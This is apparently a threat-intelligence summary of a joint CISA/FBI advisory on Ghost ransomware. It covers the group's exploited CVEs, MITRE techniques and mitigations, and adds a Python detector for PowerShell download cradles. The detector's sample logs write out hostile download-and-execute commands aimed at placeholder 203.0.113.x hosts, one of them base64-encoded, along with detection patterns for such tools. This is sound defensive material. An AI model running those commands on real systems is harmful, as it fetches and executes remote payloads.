CISA and FBI Warn of Global Threat from Ghost Ransomware

The “Ghost” ransomware group, also tracked as Cring and Crypt3r, is the subject of a joint US advisory (CISA and FBI) for compromising organizations worldwide, primarily by exploiting known, unpatched vulnerabilities in internet-facing systems and then operating with widely available tooling. Its activity spans more than 70 countries and many sectors, from SMBs to critical infrastructure. Affected: organizations, SMBs, critical infrastructure, schools, universities, healthcare, government, religious institutions, technology, manufacturing

Keypoints :

  • The Ghost actors are assessed to operate from China, which sets them apart from most ransomware actors, who are based in former Soviet states.
  • They compromise organizations in over 70 countries with financially motivated attacks.
  • Initial access is achieved through vulnerabilities in public-facing systems and servers.
  • Notable exploited vulnerabilities include those in Fortinet FortiOS, Adobe ColdFusion, Microsoft SharePoint, and Microsoft Exchange.
  • Ghost actors rely on Cobalt Strike as their primary post-exploitation tool, deploying its beacons for command and control and for follow-on activity inside the compromised network.
  • The group often issues ransom notes claiming exfiltrated data will be sold if demands are not met.
  • Typically, they do not exfiltrate significant data that could cause major harm to victims.
  • Ghost actors show a preference for easier targets and often abandon attempts against hardened systems.
  • CISA recommends key mitigations such as regular backups, timely patches for known vulnerabilities, network segmentation, and the use of multi-factor authentication.

MITRE Techniques :

  • T1071.001 – Application Layer Protocol: Web Protocols: Ghost actors use Cobalt Strike beacons for command and control communications (this sub-technique covers HTTP/HTTPS, Cobalt Strike's default beacon transport).
  • T1083 – File and Directory Discovery: enumerating files and directories on victim hosts, including to determine which anti-malware products are installed.
  • T1059.001 – Command and Scripting Interpreter: PowerShell: PowerShell is used to run commands and to download additional malware onto compromised hosts.
  • T1068 – Exploitation for Privilege Escalation: exploiting vulnerabilities to gain elevated privileges on a host after a foothold is obtained. Note that the initial-access behaviour described above (exploiting vulnerabilities in public-facing systems) maps to a different technique, T1190 – Exploit Public-Facing Application.
  • T1537 – Transfer Data to Cloud Account: listed for exfiltration; in practice the ransom notes claim that data was exfiltrated, while the advisory reports that little data is actually taken.
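The PowerShell download-and-execute behaviour in the T1059.001 entry above is the kind of activity a defender can check for in endpoint logs. Below is an added example, not code from the advisory or the article, of a small Python detector that reads PowerShell Script Block Logging (Event ID 4104) records, flags common download cradles (WebClient.DownloadString, Invoke-WebRequest, IEX, BITS), and decodes -EncodedCommand payloads so the same rules are applied to the hidden command as well. The flat log format, hostnames, timestamps and 203.0.113.x addresses are constructed for this example and are not indicators from the advisory.

```python
"""
Added example: heuristic detection of PowerShell download cradles in
Script Block Logging (Event ID 4104) records. Not code from the CISA/FBI
advisory; the log layout and all sample values are constructed here.
"""
import base64
import binascii
import re

# Detection rules as (compiled regex, tag). These cover common cradle forms
# and are heuristics, not a complete catalogue of PowerShell download methods.
RULES = [
    (re.compile(r"Download(?:String|File|Data)\s*\(", re.I), "webclient-download"),
    (re.compile(r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b", re.I), "web-request"),
    (re.compile(r"\bIEX\b|Invoke-Expression", re.I), "invoke-expression"),
    (re.compile(r"Start-BitsTransfer|\bbitsadmin\b", re.I), "bits-transfer"),
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden|-nop\b|-noprofile|-noni\b|-noninteractive", re.I), "evasion-flags"),
]
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Constructed flat export format: "<timestamp> <host> EID=<id> ScriptBlockText=<text>"
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+EID=(?P<eid>\d+)\s+ScriptBlockText=(?P<text>.*)$")


def encode_command(cmd: str) -> str:
    """Encode a command the way PowerShell's -EncodedCommand expects (UTF-16LE, then base64)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(text: str):
    """Return the decoded -EncodedCommand payload found in text, or None if absent/invalid."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_line(line: str):
    """Return a finding dict for a suspicious 4104 record, or None if it looks benign."""
    m = LINE_RE.match(line)
    if not m or m.group("eid") != "4104":
        return None
    text = m.group("text")
    decoded = decode_encoded_command(text)
    # Run the rules over the visible text and, when present, the decoded payload.
    surface = text if decoded is None else text + "\n" + decoded
    tags = {tag for rx, tag in RULES if rx.search(surface)}
    if decoded is not None:
        tags.add("encoded-command")
    # Evasion flags alone are noisy; require a download/execution or encoding indicator.
    if not tags or tags == {"evasion-flags"}:
        return None
    return {"ts": m.group("ts"), "host": m.group("host"), "tags": sorted(tags), "decoded": decoded}


def scan(lines):
    """Apply analyze_line to every record and keep the findings."""
    return [f for f in (analyze_line(line) for line in lines) if f]


# Constructed sample records (hosts, times and TEST-NET addresses are made up).
SAMPLE_LOGS = [
    "2025-02-19T10:01:02Z SRV01 EID=4104 ScriptBlockText=Get-ChildItem C:\\Users",
    "2025-02-19T10:02:15Z SRV01 EID=4104 ScriptBlockText=IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')",
    "2025-02-19T10:03:40Z SRV02 EID=4104 ScriptBlockText=powershell -nop -w hidden -enc "
    + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/b.ps1')"),
    "2025-02-19T10:04:01Z SRV03 EID=4104 ScriptBlockText=Invoke-WebRequest -Uri https://203.0.113.7/upd.exe -OutFile C:\\ProgramData\\upd.exe",
    "2025-02-19T10:05:55Z SRV03 EID=4104 ScriptBlockText=Get-Service | Where-Object Status -eq Running",
    "2025-02-19T10:06:10Z SRV04 EID=4103 ScriptBlockText=IEX 'not a 4104 record, ignored'",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f["ts"], f["host"], ",".join(f["tags"]), (f["decoded"] or "")[:60])
```

Decoding the -EncodedCommand payload before matching matters: the encoded record would otherwise show only the evasion flags, and the same cradle that is obvious in clear text would be missed. In production the equivalent is Event ID 4104 from the PowerShell operational log, with Script Block Logging enabled by policy.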

Indicators of Compromise :

  • [Vulnerability] CVE-2018-13379 – Fortinet FortiOS SSL VPN path traversal
  • [Vulnerability] CVE-2010-2861 – Adobe ColdFusion directory traversal
  • [Vulnerability] CVE-2009-3960 – Adobe BlazeDS (as used in ColdFusion) XML external entity injection
  • [Vulnerability] CVE-2021-34473 – Microsoft Exchange Server (ProxyShell chain)
  • [Vulnerability] CVE-2021-34523 – Microsoft Exchange Server (ProxyShell chain)
  • [Vulnerability] CVE-2021-31207 – Microsoft Exchange Server (ProxyShell chain)

All six are long-public vulnerabilities with vendor patches available; the group's success depends on those patches not having been applied to internet-facing systems.

Full Story: https://www.infosecurity-magazine.com/news/cisa-fbi-warn-global-threat-ghost/